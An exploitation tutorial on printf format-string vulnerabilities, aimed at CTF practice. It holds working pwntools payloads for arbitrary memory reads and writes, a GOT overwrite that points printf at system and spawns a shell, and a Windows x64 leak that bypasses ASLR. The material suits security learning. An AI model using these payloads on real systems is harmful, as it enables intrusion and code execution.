Format Strings

Notice that the attacker controls the format argument passed to printf, so the attacker's input sits on the stack when printf is called. This means specific memory addresses can be placed on the stack as part of that input.

Caution

An attacker who controls this input can add arbitrary addresses to the stack and make printf access them. The next section explains how to use this behavior.

Arbitrary Read

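The formatter %n$s makes printf take the address located at the n-th position, follow it, and print whatever is there as a string (printing until a 0x00 byte is found). So if the base address of the binary is 0x8048000, and we know that the user input starts at the 4th position on the stack, it is possible to print the beginning of the binary with: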

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

Caution

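Note that you cannot put the address 0x8048000 at the beginning of the input, because its packed form contains a 0x00 byte that would terminate the string before the format specifier is read.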
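A minimal sketch of how such a payload can be laid out so that the address lands exactly on a parameter boundary after the format specifier. It uses only the standard library (`struct` stands in for pwntools' `p32`/`p64`); the helper name `build_read_payload` and its parameters are illustrative assumptions, not part of any library. It produces the shortest layout, so for an input offset of 4 it emits `%5$s` followed directly by the address, one slot shorter than the example above.

```python
import struct

def build_read_payload(addr, input_offset, word=4):
    """Build '%<k>$s' + filler + packed address (hypothetical helper).

    input_offset: positional index where our input starts on the stack.
    word: size of one stack slot (4 on 32-bit, 8 on 64-bit).
    """
    slots = 1
    while True:
        # The address is placed right after `slots` slots of specifier + filler.
        spec = f"%{input_offset + slots}$s".encode()
        if len(spec) <= slots * word:
            break
        slots += 1
    padded = spec.ljust(slots * word, b"x")  # filler keeps the address aligned
    packed = struct.pack("<I" if word == 4 else "<Q", addr)
    return padded + packed  # address goes last because it may contain 0x00

print(build_read_payload(0x8048000, 4))
```

Placing the address after the specifier is the design choice that matters here: any 0x00 byte in the packed address then only cuts off data that printf no longer needs to parse.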

Find offset

To find the offset of your input, send 4 or 8 bytes (0x41414141) followed by %1$x, and increase the index until the A's are printed back.
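As a rough illustration of that idea, the sketch below builds a single probe that reads several positions at once and then searches the echoed output for the marker. It assumes a 32-bit little-endian target (each `%x` prints one 4-byte slot); the function names and the sample output used in the comment are made up for illustration.

```python
def build_probe(count, marker=b"AAAA"):
    """Marker followed by .%1$x.%2$x ... up to `count` positional reads."""
    specs = "".join(f".%{i}$x" for i in range(1, count + 1))
    return marker + specs.encode()

def find_offset(output, marker=b"AAAA"):
    """Return the 1-based position whose value equals the marker, or None."""
    # A little-endian slot holding b"AAAA" is printed by %x as "41414141".
    needle = marker[::-1].hex().encode()
    fields = output.strip().split(b".")[1:]  # drop the echoed marker itself
    for index, field in enumerate(fields, start=1):
        if field == needle:
            return index
    return None

# Fabricated sample of what a vulnerable binary might echo back:
sample = b"AAAA.ffffd5a0.c8.0.41414141.2431252e\n"
print(build_probe(5), find_offset(sample))
```

Compared with spawning one process per candidate index, a single probe needs only one round trip, at the cost of a longer input.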

<details>
<summary>Brute Force printf offset</summary>

```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over candidate offsets (positional arguments are 1-indexed)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break

    # Close the process
    p.close()
```

</details>

### What is it useful for

**Arbitrary reads** can be useful to:

- **Dump** the **binary** from memory
- **Access specific parts of memory where sensitive** **info** is stored (such as canaries, encryption keys or custom passwords, as in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
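Dumping memory through `%n$s` has one subtlety: each read stops at the first 0x00, so an empty result means the byte at that address is itself 0x00. A minimal sketch of the resulting loop is shown here, assuming a hypothetical `leak(addr)` callback that wraps a single `%n$s` read; the fake in-memory target exists only to make the example self-contained.

```python
def dump_memory(leak, start, length):
    """Reassemble `length` bytes starting at `start` from string-style leaks."""
    out = bytearray()
    while len(out) < length:
        chunk = leak(start + len(out))
        # %s returns everything up to (not including) the terminating NUL,
        # so the terminator is known to be 0x00 and can be appended.
        out += chunk + b"\x00"
    return bytes(out[:length])

# Fake target standing in for a real process (illustration only).
BASE = 0x8048000
MEMORY = b"\x7fELF\x01\x01\x01\x00\x00\x00AB\x00"

def fake_leak(addr):
    data = MEMORY[addr - BASE:]
    return data.split(b"\x00", 1)[0]

print(dump_memory(fake_leak, BASE, len(MEMORY)) == MEMORY)
```

In a real exploit, addresses whose packed form contains bytes the input channel rejects (for example a newline) cannot be requested directly and need to be skipped or reached from a neighbouring address.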

## **Arbitrary Write**

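The formatter **`%<num>$n`** writes the number of bytes printed so far to the address pointed to by the <num>-th parameter on the stack. If an attacker can make printf output as many characters as desired, **`%<num>$n`** can be made to write an arbitrary number to an arbitrary address.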

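Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter **`%.<num-write>x%<num>$n`** can be used: the precision makes printf emit **`<num-write>`** characters, and that count (plus any characters already printed) is written to the address pointed to by the `<num>` position.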
```bash
AAAA%.6000d%4\$n -> Write 6004 in the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
```

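However, note that to write a value such as 0x08049724 (a huge number to write in one go), $hn is usually used instead of $n. This writes only 2 bytes, so the operation is done twice: once for the highest 2 bytes of the address and once for the lowest 2 bytes.

Therefore, this vulnerability allows writing anything to any address (arbitrary write).

In this example, the goal is to overwrite the address of a function in the GOT table that is going to be called later. The same primitive could also be combined with other arbitrary-write-to-exec techniques: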
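To make the counting rule concrete, here is a small sketch that walks a format string and reports the running count each `%<k>$n`-style specifier would store. It is not a printf implementation: it only models literal bytes, `%.Nd`/`%.Nx` and `%<k>$n`/`$hn`/`$hhn`, and it assumes every precision specifier prints exactly N characters (true when the converted value has no more than N digits and no sign). The function name is an assumption for illustration.

```python
import re

# %.Nd or %.Nx (group 1 = N), or %k$n / %k$hn / %k$hhn (group 2 = k)
TOKEN = re.compile(rb"%\.(\d+)[dx]|%(\d+)\$(?:hh|h)?n")

def counts_written(fmt):
    """Return [(param_index, running_count)] for each %k$n-style specifier."""
    printed = 0
    pos = 0
    writes = []
    for match in TOKEN.finditer(fmt):
        printed += match.start() - pos  # literal bytes before this specifier
        pos = match.end()
        if match.group(1) is not None:
            printed += int(match.group(1))  # assumed to print exactly N chars
        else:
            # With $hn only the low 16 bits of this count are stored.
            writes.append((int(match.group(2)), printed))
    return writes

print(counts_written(b"AAAA%.6000d%4$n"))
```

For the input `AAAA%.6000d%4$n` the four literal bytes plus the 6000 padded characters give the count 6004 that is stored through the 4th parameter.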

Write What Where 2 Exec

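We are going to overwrite a function that receives its arguments from the user and point it to the system function.
As mentioned, writing the address usually takes two steps: first you write 2 bytes of the address and then the other 2. To do so, $hn is used.

HOB refers to the 2 higher bytes of the address
LOB refers to the 2 lower bytes of the address

Then, because the count printed so far can only grow, you need to write the smaller of [HOB, LOB] first and then the other one.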

If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn

If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn

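Payload fields, in order: address of the HOB, address of the LOB, HOB_shellcode-8, parameter index of the HOB address, LOB_shellcode-HOB_shellcode, parameter index of the LOB address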

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
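The two templates above can be sketched as one small builder. This is an illustrative standard-library version for a 32-bit target, not the pwntools implementation; `build_hn_payload` and its parameters are assumed names. It rejects paddings between 1 and 7 because `%.Nx` may print up to 8 hex digits regardless of a smaller precision, which would make the count unpredictable.

```python
import struct

def build_hn_payload(target, value, offset):
    """Two-step $hn write of a 32-bit `value` at `target` (hypothetical helper).

    offset: positional index where the start of our input is found.
    """
    hob, lob = value >> 16, value & 0xFFFF
    # (halfword to write, index of the pointer that receives it), smaller first
    writes = sorted([(hob, offset), (lob, offset + 1)])
    payload = struct.pack("<II", target + 2, target)  # [address+2][address]
    printed = len(payload)                            # 8 bytes already output
    for half, index in writes:
        pad = half - printed
        if pad:
            if pad < 8:
                raise ValueError("padding too small for a predictable %x width")
            payload += f"%.{pad}x".encode()
        payload += f"%{index}$hn".encode()
        printed = half
    return payload

print(build_hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

With target 0x08049724, value 0xBFFFFC2F and offset 4, the result is the same byte string as the `python -c` one-liner above.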

Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

Format Strings Template

Or this basic example from here:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()

Format Strings to BOF

It is possible to abuse the write primitive of a format string vulnerability to write to addresses on the stack and exploit a buffer overflow type of vulnerability.

Windows x64: Format-string leak to bypass ASLR (no varargs)

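On Windows x64 the first four integer/pointer parameters are passed in registers: RCX, RDX, R8, R9. In many buggy call-sites the attacker-controlled string is used as the format argument but no variadic arguments are provided, for example: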

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

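Because no varargs are passed, any conversion such as "%p", "%x" or "%s" makes the CRT read the next variadic argument from the appropriate register. With the Microsoft x64 calling convention, the first such read for "%p" comes from R9, since the three fixed arguments already occupy RCX, RDX and R8. Whatever transient value is in R9 at the call-site will be printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by surrounding code, or a callee-saved value) that can be used to recover the module base and defeat ASLR.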
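The mapping from conversions to argument locations can be sketched as follows. It assumes every conversion consumes one 8-byte integer slot and expresses stack locations relative to RSP at the call instruction, where the fifth argument sits just past the 32-byte shadow space; the function name is illustrative.

```python
REGISTERS = ["RCX", "RDX", "R8", "R9"]

def vararg_sources(fixed_args, conversions):
    """Where each missing vararg is read from on Windows x64 (sketch).

    fixed_args: number of named parameters at the call-site
                (3 for _snprintf(dst, len, fmt)).
    conversions: number of conversions in the attacker-controlled format.
    """
    sources = []
    for position in range(fixed_args, fixed_args + conversions):
        if position < 4:
            sources.append(REGISTERS[position])
        else:
            # 5th and later arguments live on the stack after the shadow space
            sources.append(f"[rsp+{0x20 + 8 * (position - 4):#x}]")
    return sources

print(vararg_sources(3, 3))
```

For the `_snprintf` call above only the first conversion comes from a register; a second or third "%p" samples caller stack slots instead.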

Practical workflow:

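- Inject a harmless format such as "%p " at the very beginning of the attacker-controlled string so that the first conversion executes before any filtering.
- Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as leak - known_offset.
- Reuse that base to compute absolute addresses for ROP gadgets and IAT entries remotely.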

Example (abbreviated python):

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Notes:

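- The exact offset to subtract is found once during local reversing and then reused for the same binary/version.
- If "%p" does not print a valid pointer on the first try, try other specifiers ("%llx", "%s") or multiple conversions ("%p %p %p") to sample other argument registers/stack.
- This pattern is specific to the Windows x64 calling convention and printf-family implementations that fetch nonexistent varargs from registers when the format string requests them.

This technique is extremely useful to bootstrap ROP on Windows services compiled with ASLR and no obvious memory disclosure primitives.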
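The base-recovery step can be wrapped with a cheap sanity check. The sketch below assumes the leaked token is a hex string (with or without a `0x` prefix) and relies on Windows images being loaded at 64 KiB-aligned addresses, so a wrong offset is usually caught immediately. The helper names and the RVA 0x1234 are hypothetical; the pointer and offset values are the ones from the example above.

```python
def parse_pointer(token):
    """Parse a leaked pointer such as b'00007FF6693D0660' or b'0x7ff6693d0660'."""
    return int(token.decode().strip(), 16)

def recover_base(leaked, known_offset, alignment=0x10000):
    """Image base = leak - offset, rejected if it is not 64 KiB aligned."""
    base = leaked - known_offset
    if base % alignment:
        raise ValueError(f"suspicious base {base:#x}: wrong offset or wrong leak?")
    return base

def rebase(base, rva):
    """Absolute address of a gadget or IAT entry given its RVA."""
    return base + rva

leaked = parse_pointer(b"00007FF6693D0660")
base = recover_base(leaked, 0x20660)
print(hex(base), hex(rebase(base, 0x1234)))  # 0x1234 is a made-up RVA
```

Failing loudly on a misaligned base is deliberate: sending a ROP chain computed from a wrong base typically crashes the service and may cost the only attempt.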

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string to overwrite the address of fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
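32 bit, relro, no canary, nx, no pie, format string to write an address inside main in .fini_array (so the flow loops back one more time) and to write the address of system over the GOT entry for strlen. When the flow returns to main, strlen is called with user input and, since it now points to system, executes the passed commands.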

References